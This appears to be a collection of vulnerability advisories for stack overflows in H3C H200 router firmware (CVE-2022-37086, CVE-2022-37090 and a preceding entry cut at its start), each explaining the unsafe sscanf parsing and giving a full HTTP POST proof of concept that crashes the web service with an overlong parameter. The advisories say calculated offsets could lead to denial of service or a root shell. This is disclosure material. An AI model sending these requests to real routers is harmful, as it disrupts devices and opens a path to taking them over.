1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/aspForm HTTP/1.1
    Host: 192.168.0.124:80
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Referer: https://121.226.152.63:8443/router_password_mobile.asp
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 553
    Origin: https://192.168.0.124:80
    DNT: 1
    Connection: close
    Cookie: JSESSIONID=5c31d502
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    
    CMD=Asp_SetTimingtimeWifiAndLed&param=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;
    

The picture above shows the process information before we send poc.

In the picture above, we can see that the PID has changed since we sent the POC.

The picture above is the log information.

By calculating offsets, we can compile special data to refer to denial-of-service attacks(DOS).

Finally, you also can write exp to get a stable root shell.

CVE-2022-37086: vuln/H3C/H200/3 at main · Darry-lang1/vuln

H3C H200 H200V100R004 was discovered to contain a stack overflow via the function Edit_BasicSSID.

**H3C H200\[H200-EI\] (H200V100R004) has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.h3c.com/
*   Firmware download address ： https://www.h3c.com/cn/d\_202009/1345678\_30005\_0.htm

**Product Information**

H3C H200\[H200-EI\] H200V100R004, the latest version of simulation overview：

**Vulnerability details**

The H3C H200\[H200-EI\] (H200V100R004) was found to have a stack overflow vulnerability in the Edit\_BasicSSID function. An attacker can obtain a stable root shell through a carefully constructed payload.

In the Edit_BasicSSID function,V33(the valueparam) we entered is formatted using the sscanf function and in the form of %[^;]. This greedy matching mechanism is not secure, as long as the size of the data we enter is larger than the size of V34, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/aspForm HTTP/1.1
    Host: 192.168.0.124:80
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Referer: https://121.226.152.63:8443/router_password_mobile.asp
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 553
    Origin: https://192.168.0.124:80
    DNT: 1
    Connection: close
    Cookie: JSESSIONID=5c31d502
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    
    CMD=Edit_BasicSSID&param=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;
    

The picture above shows the process information before we send poc.

In the picture above, we can see that the PID has changed since we sent the POC.

The picture above is the log information.

By calculating offsets, we can compile special data to refer to denial-of-service attacks(DOS).

Finally, you also can write exp to get a stable root shell.

CVE-2022-37090: vuln/H3C/H200/8 at main · Darry-lang1/vuln

H3C H200 H200V100R004 was discovered to contain a stack overflow via the AddWlanMacList function.

**H3C H200\[H200-EI\] (H200V100R004) has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.h3c.com/
*   Firmware download address ： https://www.h3c.com/cn/d\_202009/1345678\_30005\_0.htm

**Product Information**

H3C H200\[H200-EI\] H200V100R004, the latest version of simulation overview：

**Vulnerability details**

The H3C H200\[H200-EI\] (H200V100R004) was found to have a stack overflow vulnerability in the AddWlanMacList function. An attacker can obtain a stable root shell through a carefully constructed payload.

In the AddWlanMacList function,the param we entered is formatted using the sscanf function and in the form of %u;%[^;];%[^;];. This greedy matching mechanism is not secure, as long as the size of the data we enter is larger than the size of V5 or V13, it will cause a stack overflow.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /goform/aspForm HTTP/1.1
    Host: 192.168.0.124:80
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Referer: https://121.226.152.63:8443/router_password_mobile.asp
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 553
    Origin: https://192.168.0.124:80
    DNT: 1
    Connection: close
    Cookie: JSESSIONID=5c31d502
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    
    CMD=AddWlanMacList&param=1;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA;
    

The picture above shows the process information before we send poc.

In the picture above, we can see that the PID has changed since we sent the POC.

The picture above is the log information.

By calculating offsets, we can compile special data to refer to denial-of-service attacks(DOS).

Finally, you also can write exp to get a stable root shell.

Tag

#js